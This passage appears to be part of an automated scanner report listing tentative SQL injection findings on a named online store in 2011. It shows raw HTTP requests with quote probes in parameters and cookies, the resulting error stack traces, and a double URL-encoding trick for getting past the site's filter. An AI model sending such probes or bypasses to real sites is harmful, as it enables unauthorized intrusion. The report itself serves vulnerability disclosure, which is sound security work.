<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: REQ_000002 at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:287) at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41) at ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=110230053450,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:55 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The ThemeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ThemeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300'&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=105934960573,0) Date: Sun, 27 Feb 2011 17:45:50 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... /store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ThemeID=1279300%27&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300''&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300%27%27&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=105934961726,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
1.19. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://shop.winamp.com
Path: /store
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1'=1 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704877618,0) Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 41391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... :include src="/store?1'=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000002 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:516) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]... .tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:690) at java.lang.Thread.run(Thread.java:619) Caused by: com.digitalriver.rules.EvaluationException: java.lang.NullPointerException Failed expression:product.getAllVariations() at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:190) at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:165)
...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1''=1 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?1''=1&Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704878770,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:41 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The productID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the productID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280272038,0) Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 25208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500%2527"--> ...[SNIP]... <pre>java.lang.NullPointerException at com.digitalriver.security.SecurityModuleImpl.isPageAllowed(SecurityModuleImpl.java:762) at sun.reflect.GeneratedMethodAccessor290.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorIm ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=67280272104,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:46:06 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The s_pers cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_pers cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704869494,0) Date: Sun, 27 Feb 2011 17:47:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704869912,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704872526,0) Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527%2527
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704873667,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The BIGipServerp-drh-dc1pod5-pool1-active cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerp-drh-dc1pod5-pool1-active cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000'
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525008612,0) Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 82107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <pre>java.lang.RuntimeException: java.lang.RuntimeException: java.lang.RuntimeException: Error serving pageContext. at com.digitalriver.site.taglib.StyleTag.doStartTagInternal(StyleTag.java:47) at com.digitalriver.taglib.TagProfil ...[SNIP]...
Request 2
